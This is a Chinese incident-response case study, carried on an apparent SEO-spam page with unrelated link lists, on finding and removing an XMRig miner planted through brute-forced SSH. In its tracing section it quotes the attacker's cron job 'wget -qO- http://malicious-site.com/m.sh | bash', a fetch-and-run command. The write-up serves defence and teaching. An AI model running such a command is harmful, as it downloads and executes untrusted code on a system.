当前位置: 首页 > wzjs >正文

安徽省住房城乡建设厅网站公示互联网营销师教材

wzjs 2025/7/26 16:43:59
安徽省住房城乡建设厅网站公示,互联网营销师教材,wordpress自定义首页布局,长沙网站制作合作商在日常运维过程中,网络安全事件时有发生,快速响应和精准溯源是保障业务稳定运行的关键。本文将通过一个实际案例,详细解析从发现问题到溯源定位,再到最终解决的完整流程。 目录 一、事件背景 二、事件发现 1. 监控告警触发 2…

在日常运维过程中,网络安全事件时有发生,快速响应和精准溯源是保障业务稳定运行的关键。本文将通过一个实际案例,详细解析从发现问题到溯源定位,再到最终解决的完整流程。

目录

一、事件背景

二、事件发现

1. 监控告警触发

2. 初步分析

三、溯源分析

1. 确定入侵源头

四、处置与恢复

1. 立刻阻断攻击者控制

2. 清除恶意程序

3. 服务器加固

五、总结与经验

一、事件背景

某互联网公司运维团队在日常巡检时,发现一台数据库服务器(192.168.1.100)的CPU使用率异常升高,并伴随大量未知进程占用系统资源,同时MySQL的查询响应时间大幅延长。初步判断可能存在异常入侵行为。

二、事件发现

1. 监控告警触发

使用 Zabbix 监控发现:

  • CPU 使用率持续超过 90%(长期稳定在 20% 左右)
  • MySQL QPS/TPS 下降明显,导致应用访问变慢
  • 服务器 磁盘 I/O 高异常

同时,Wazuh SIEM 平台检测到该服务器有异常 SSH 登录记录,涉及多个可疑 IP 地址。

2. 初步分析

(1)服务器资源消耗情况排查

top -c
ps aux --sort=-%cpu | head -10
ps aux --sort=-%mem | head -10

发现多个可疑进程(xmrigkthreadd)在占用大量 CPU 资源,疑似挖矿木马。

(2)网络连接检测

netstat -antp
ss -tunlp
lsof -i

发现多个可疑的远程连接,连接至境外服务器 45.67.X.X:3333,疑似 C&C 服务器。

(3)日志分析

grep "Accepted password" /var/log/auth.log | awk '{print $1,$2,$3,$9,$11}'

发现多个异常 SSH 登录记录,部分 IP 源自境外,且短时间内进行了高频登录。

三、溯源分析

1. 确定入侵源头

使用 HIDS(主机入侵检测) 结合 日志分析,溯源入侵行为:

  1. 攻击者利用弱密码暴力破解 SSH 账户(root/root123)
  2. 登录后下载并运行恶意挖矿程序(XMRig)
  3. 修改 crontab 以保持长期控制

检查 SSH 登录记录

last -i | grep "root"

发现 root 账户从多个不明 IP 登录。

检查计划任务

crontab -l
cat /etc/crontab
ls -al /etc/cron.hourly/

发现恶意计划任务,定期下载并运行木马:

wget -qO- http://malicious-site.com/m.sh | bash

查找可疑进程执行路径

which xmrig
ls -l /usr/local/bin/xmrig
strings /usr/local/bin/xmrig

确认该进程为 挖矿程序,并且被设置为开机自启。

四、处置与恢复

1. 立刻阻断攻击者控制

  • 阻止恶意 IP
iptables -A INPUT -s 45.67.X.X -j DROP
firewalld-cmd --permanent --add-rich-rule='rule family="ipv4" source address="45.67.X.X" reject'
  • 禁用 root 远程登录
sed -i 's/^PermitRootLogin yes/PermitRootLogin no/' /etc/ssh/sshd_config
systemctl restart sshd
  • 修改所有账户密码,并启用 SSH 公钥认证

2. 清除恶意程序

  • 杀掉恶意进程
pkill -f xmrig
kill -9 $(pgrep -f xmrig)
  • 删除木马文件
rm -rf /usr/local/bin/xmrig /tmp/malicious.sh /etc/cron.hourly/malicious
  • 检查后门
ls -al /root/.ssh/

发现 authorized_keys 中被植入了攻击者的 SSH 公钥,需删除:

echo "" > /root/.ssh/authorized_keys

3. 服务器加固

  • 开启 fail2ban 防暴力破解
apt install fail2ban -y
systemctl enable fail2ban
  • 设置 SSH 端口为非默认端口
sed -i 's/#Port 22/Port 2222/' /etc/ssh/sshd_config
systemctl restart sshd
  • 关闭不必要的端口
netstat -tulnp | grep LISTEN
systemctl disable unneeded-service

五、总结与经验

  1. SSH 账户密码要设置足够复杂,避免使用 root 直接登录。
  2. 部署 Wazuh、Fail2ban 等安全工具,实时监控入侵行为。
  3. 定期检查服务器 CPU、内存、I/O 指标,发现异常及时分析。
  4. 建立应急响应预案,形成自动化处置流程。
http://www.dtcms.com/wzjs/75927.html

相关文章:

  • 长沙可以做网站的公司seo优化查询
  • 正能量erp软件下载网站文登seo排名
  • 网站开发的安全性原则网站关键字优化价格
  • 织梦想把网站上传到现有网站的文件夹中测试现有网站能正常使用营销网络营销
  • 厚街做网站价格服务营销理论
  • wordpress公司网站模板怎样和政府交换友链
  • 高速公路建设管理局网站如何做好市场推广
  • 做电影网站详细教程保定网站建设报价
  • 南京营销型网站建设公司浙江百度代理公司
  • 济南网站建设优化公司网络舆情监测系统
  • 宿迁网站建设多少钱seo关键词优化经验技巧
  • 怎么做网站板块杭州排名优化公司电话
  • 为什么要建设图书馆网站怎样建网站?
  • 群站wordpress外链提交
  • 国外网页网站什么是百度竞价推广
  • 网站后台程序怎么做查询网站备案信息
  • wordpress woo theme郑州网站建设方案优化
  • 不拦截网站的浏览器营销软文范例大全100
  • 大宗贸易采购平台硬件优化大师下载
  • 上海企业服务seo外链建设的方法有
  • 房屋设计装修网站廊坊seo整站优化
  • 如何查询网站的主机推广自己的网站
  • WordPress全站跳转电商平台排名
  • 国内摄影作品网站有了域名如何建立网站
  • 怎么做门户网站设计上海网络营销公司
  • 安徽省六安市城乡建设厅网站国际军事新闻今日头条
  • magento 网站百度一下搜索引擎大全
  • 雷州市住房和城乡规划建设局网站seo去哪学
  • 深圳龙岗做网站公司推广普通话内容100字
  • 域名可以同时做邮箱和网站么口碑营销什么意思